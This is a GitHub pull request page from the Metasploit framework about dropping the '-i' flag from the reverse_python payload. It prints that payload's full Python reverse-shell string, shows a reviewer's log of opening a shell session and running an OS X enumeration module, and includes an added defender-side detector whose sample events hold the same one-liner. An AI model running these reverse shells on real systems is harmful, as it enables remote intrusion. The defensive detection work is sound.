Remove -i from shell in reverse_python #4864

Merged
merged 2 commits into from
Mar 2, 2015

Conversation

wvu
Contributor

@wvu wvu commented Mar 2, 2015

wvu@kharak:~/metasploit-framework:master$ git grep -w -- -i modules/payloads | cat
modules/payloads/singles/cmd/unix/reverse_python.rb:    raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"#{datastore['SHELL']}\",\"-i\"]);"
wvu@kharak:~/metasploit-framework:master$ 

Consistency with the rest of our payloads. Also, if a shell doesn't support the intended -i, we're fscked. Rediscovered in #4857.

  • Spin up exploit/multi/handler
  • Pop a reverse_python shell
  • See that everything works
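
Added example, not part of the original comment or of Metasploit's code: a defender-side check over process-creation command lines that flags the socket-to-stdio pattern visible in the payload string above, whether or not the shell is started with `-i`. The sample events, the host `192.0.2.10`, the variant without the flag, and the names `classify` and `scan` are assumptions constructed for illustration, and the check only applies when the script text is visible in the command line.

```python
import re

# Matches os.dup2(<sock>.fileno(), <fd>) and captures the target descriptor.
DUP2_RE = re.compile(r"os\.dup2\(\s*\w+\.fileno\(\)\s*,\s*([0-2])\s*\)")
# A socket being connected outbound, and a child process being started.
CONNECT_RE = re.compile(r"\.connect\(\s*\(")
SPAWN_RE = re.compile(r"subprocess\.(?:call|Popen|run)\(|os\.system\(|pty\.spawn\(")
# The interactive flag passed as its own argv element, e.g. ["/bin/sh","-i"].
DASH_I_RE = re.compile(r"""["']-i["']""")


def classify(cmdline):
    """Return None if the pattern is absent, else a dict describing the match."""
    fds = set(DUP2_RE.findall(cmdline))
    if fds != {"0", "1", "2"}:  # stdin, stdout and stderr must all be redirected
        return None
    if not (CONNECT_RE.search(cmdline) and SPAWN_RE.search(cmdline)):
        return None
    # Report the flag as context only; the verdict never depends on it.
    return {"interactive_flag": bool(DASH_I_RE.search(cmdline))}


def scan(events):
    """events: iterable of (pid, cmdline). Returns a list of (pid, finding)."""
    hits = []
    for pid, cmdline in events:
        finding = classify(cmdline)
        if finding is not None:
            hits.append((pid, finding))
    return hits


# Constructed process-creation events (not captured from a real host).
_BODY = ('import socket,subprocess,os;host="192.0.2.10";port=4444;'
         's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));'
         'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);')
SAMPLE_EVENTS = [
    (101, "python -c '" + _BODY + 'p=subprocess.call(["/bin/sh","-i"]);' + "'"),
    (102, "python -c '" + _BODY + 'p=subprocess.call(["/bin/sh"]);' + "'"),
    (103, "python -c 'import subprocess;subprocess.call([\"grep\",\"-i\",\"err\",\"app.log\"])'"),
    (104, "python -c 'import os;os.dup2(os.open(\"out.log\",1),1)'"),
]

if __name__ == "__main__":
    for pid, finding in scan(SAMPLE_EVENTS):
        print(pid, finding)
```

A rule keyed on the `-i` argument alone would miss event 102 and fire on the unrelated `grep -i` in event 103, which is why the check anchors on the descriptor redirection instead.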

@wvu
Contributor Author

wvu commented Mar 2, 2015

Not gonna golf this one.

@bcook-r7
Contributor

bcook-r7 commented Mar 2, 2015

Works as advertised

msf > use exploit/multi/handler
msf exploit(handler) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(handler) > set LHOST blah
LHOST => blah
msf exploit(handler) > run

[*] Started reverse handler on blah:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (blah:4444 -> blah:52140) at 2015-03-02 16:08:55 -0600

pwd
/Users/user/projects/metasploit-framework

Background session 1? [y/N]  y

msf exploit(handler) > use post/osx/gather/enum_osx
msf post(enum_osx) > set session -1
session => -1
msf post(enum_osx) > run

[*] Running module against mycomputer
[*] Saving all data to /Users/user/.msf4/logs/post/enum_osx/mycomputer_20150302.1141
[*]     Enumerating OS
[*]     Enumerating Network
[*]     Enumerating Bluetooth
...

@bcook-r7 bcook-r7 merged commit a648e74 into rapid7:master Mar 2, 2015
bcook-r7 pushed a commit that referenced this pull request Mar 2, 2015
This avoids sourcing the shell RC scripts, writing history, etc.
@bcook-r7
Contributor

bcook-r7 commented Mar 2, 2015

Thanks @wvu-r7 for noticing this detail.

@wvu
Contributor Author

wvu commented Mar 2, 2015

I honestly forgot about it for too long. :(

@wvu wvu deleted the beug/reverse_python branch March 2, 2015 22:36